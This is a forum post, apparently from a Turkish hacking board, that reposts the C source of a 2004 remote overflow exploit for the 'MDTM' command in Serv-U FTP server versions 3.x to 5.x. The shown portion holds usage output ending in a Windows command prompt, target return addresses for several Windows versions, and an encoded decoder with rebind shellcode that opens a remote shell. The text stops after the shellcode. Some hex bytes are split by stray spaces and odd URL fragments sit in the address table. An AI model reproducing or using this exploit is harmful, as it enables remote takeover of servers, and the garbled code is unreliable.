hacked MASTER
Mesaj Sayısı : 199 Kayıt tarihi : 08/03/08
| Konu: Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit Salı Mart 11, 2008 12:04 am | |
| /* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit * * Copyright (c) SST 2004 All rights reserved. * * Public version * * BUG find by bkbll (bkbll@cnhonker.com), cool! pPPppPPPpp * * code by Sam and 2004/01/07 * <chen_xiaobo@venustech.com.cn> * <Sam@0x557.org> * * * Revise History: * 2004/01/14 add rebind shellcode :> we can bind shellport at ftpd port. * 2004/01/09 connect back shellcode added * 2004/01/08 21:04 upgrade now , we put shellcode in file parameter * we can attack pacthed serv-U;PPPp by airsupply * 2004/01/08 change shellcode working on serv-u 4.0/4.1/4.2 now * thx airsupply * * Compile: gcc -o ex_servu ex_servu.c * * how works? * [root@core exp]# ./sv -h 192.168.10.119 -t 3 * Serv-U FTPD 3.x/4.x MDTM Command remote overflow exploit * bug find by bkbll (bkbll@cnhonker.com) code by Sam (Sam@0x557.org) * * # Connecting...... * Connected. * USER ftp . * 10 bytes send. * PASS sst@SERV-u . * 17 bytes send. * login success . * remote version: Serv-U v4.x with Windows XP EN SP1 * trigger vulnerability ! * 1027 bytes overflow strings sent! * successed!! * * * Microsoft Windows XP [Version 5.1.2600] * (C) Copyright 1985-2001 Microsoft Corp. * * [Sam Chen@SAM C:\]# * * * some thanks/greets to: * bkbll (he find this bug ), airsupply, kkqq, icbm * and everyone else who's KNOW SST;P * http://0x557.org */
#include <stdio.h> #include <unistd.h> #include <stdarg.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <assert.h> #include <fcntl.h> #include <sys/time.h>
#define VER "v5.0"
#define clearbit(buff) bzero(buff, sizeof (buff)); #define padding(buff, a) memset(buff, a, sizeof (buff));
#define MAX_LEN 2048 #define MAX_NUM 4
int x = 0, port = 21, shellport; char pass[20], user[20];
struct archs { char *desc; unsigned int magic;
}architectures[] = {
{ "Serv-U v3.x/4.x/5.x with Windows 2K CN", http://winmm.dll 0x77535985
}, { "Serv-U v3.x/4.x/5.x with Windows 2K BIG5 version", http://winmm.dll 0x77531790
}, { "Serv-U v3.x/4.x/5.x with Windows 2K EN", 0x77575985
},
{ "Serv-U v3.x/4.x/5.x with Windows XP CN SP1", 0x76b12f69
}, { "Serv-U v3.x/4.x/5.x with Windows XP EN SP1", 0x76b42a3a
}
};
char decoder [] = /* 36 bytes cool decoder by airsupply */
"\x90\x90\x90\x5E\x5F\x5B\xBE\x52\x52\x49\x41\ x46\ xBF\x52\x52\x31" "\x41\x47\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\ x39\ x73\xFC\x75\xF7" "\xFF\xD3\x90\x90";
/* fork + rebind shellcode by airsupply (one way shellcode) */ char shellcode [] =
"\x53\x52\x49\x41"
/*port offset 120 + 4*/ "\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xD9\ x85\ x12\x99\x12\xD9" "\x91\x18\x75\x19\x98\x99\x99\x12\x65\x12\x76\ x32\ x70\x8B\x9B\x99" "\x99\xC7\xAA\x50\x28\x90\x66\xEE\x65\x71\xB9\ x98\ x99\x99\xF1\xF5" "\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE\xEA\ xAB\ xC6\xCD\x66\xCC" "\x9D\x32\xAA\x50\x28\x9C\x66\xEE\x65\x71\x99\ x98\ x99\x99\x12\x6C" "\x71\x94\x98\x99\x99\xAA\x66\x18\x75\x09\x98\ x99\ x99\xCD\xF1\x98" "\x98\x99\x99\x66\xCF\xB5\xC9\xC9\xC9\xC9\xD9\ xC9\ xD9\xC9\x66\xCF" "\xA9\x12\x41\xCE\xCE\xF1\x9B\x99\x8C\x5B\x12\ x55\ xCA\xC8\xF3\x8F" "\xC8\xCA\x66\xCF\xAD\xC0\xC2\x1C\x59\xEC\x68\ xCE\ xCA\x66\xCF\xA1" "\xCE\xC8\xCA\x66\xCF\xA5\x12\x49\x10\x1F\xD9\ x98\ x99\x99\xF1\xFC" "\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\ x98\ x99\x99\x1A\x75" "\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\ x32\ x7B\x64\x5F\xDD" "\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\ x10\ xCD\xBD\xD1\x10" "\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\ x14\ x27\xDD\x98\x99" "\x99\xCE\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\ x66\ x2F\xA9\x98\x99" "\x99\xC8\x66\xCF\x91\xAA\x59\xD1\xC9\x66\xCF\ x95\ xCA\xCC\xCF\xCE" "\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\ x9A\ x4C\x12\xD3\x81" "\x12\xC3\xB9\x9A\x44\x7A\xA9\xD0\x12\xAD\x12\ x9A\ x6C\xAA\x66\x65" "\xAA\x59\x35\xA3\x79\xED\x9E\x58\x56\x9E\x9A\ x61\ x72\x6B\xA2\xE5" "\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\ x95\ xD2\x12\xC3\x85" "\x9A\x44\x12\x9D\x12\x9A\x5C\xC6\xC7\xC4\xC2\ x5B\ x9D\x99\xC8\x66" "\xED\xBD\x91\x34\xC9\x71\x3B\x66\x66\x66\x1A\ x5D\ x9D\xC0\x32\x7B" "\x74\x5A\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\ xB7\ x10\x3F\xA9\x98" "\x99\x99\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\ x50\ x1A\x58\x8C\x32" "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\ x67\ xDD\xBD\xA4\x10" "\xDD\xBD\xD1\x10\xDD\xBD\xD5\x10\xDD\xBD\xC9\ x14\ xDD\xBD\x89\x14" "\x27\xDD\x98\x99\x99\xCE\xC9\xC8\xC8\xF3\x9D\ xC8\ xC8\xC8\x66\x2F" "\xA9\x98\x99\x99\xC8\x66\xCF\x91\x18\x75\x99\ x9D\ x99\x99\xF1\x9E" "\x99\x98\x99\xCD\x66\x2F\xD1\x98\x99\x99\x66\ xCF\ x89\xF3\xD9\xF1" "\x99\x89\x99\x99\xF1\x99\xC9\x99\x99\xF3\x99\ x66\ x2F\xDD\x98\x99" "\x99\x66\xCF\x8D\x10\x1D\xBD\x21\x99\x99\x99\ x10\ x1D\xBD\x2D\x99" "\x99\x99\x12\x15\xBD\xF9\x9D\x99\x99\x5E\xD8\ x62\ x09\x09\x09\x09" "\x5F\xD8\x66\x09\x1A\x70\xCC\xF3\x99\xF1\x99\ x89\ x99\x99\xC8\xC9" "\x66\x2F\xDD\x98\x99\x99\x66\xCF\x81\xCD\x66\ x2F\ xD1\x98\x99\x99" "\x66\xCF\x85\x66\x2F\xD1\x98\x99\x99\x66\xCF\ xB9\ xAA\x59\xD1\xC9" "\x66\xCF\x95\x71\x70\x64\x66\x66\xAB\xED\x08\ x95\ x50\x25\x3F\xF2" "\x16\x6B\x81\xF8\x51\xCE\xD6\x88\x68\xE2\x05\ x76\ xC1\x96\xD8\x0E" "\x51\xCE\xD6\x8E\x4F\x15\x07\x6A\xFA\x10\x48\ xD6\ xA4\xF3\x2D\x19" "\xB4\xAB\xE1\x47\xFD\x89\x3E\x44\x95\x06\x4A\ xD2\ x28\x87\x0E\x98" "\x06\x06\x06\x06" "\x53\x52\x31\x41"; | |
|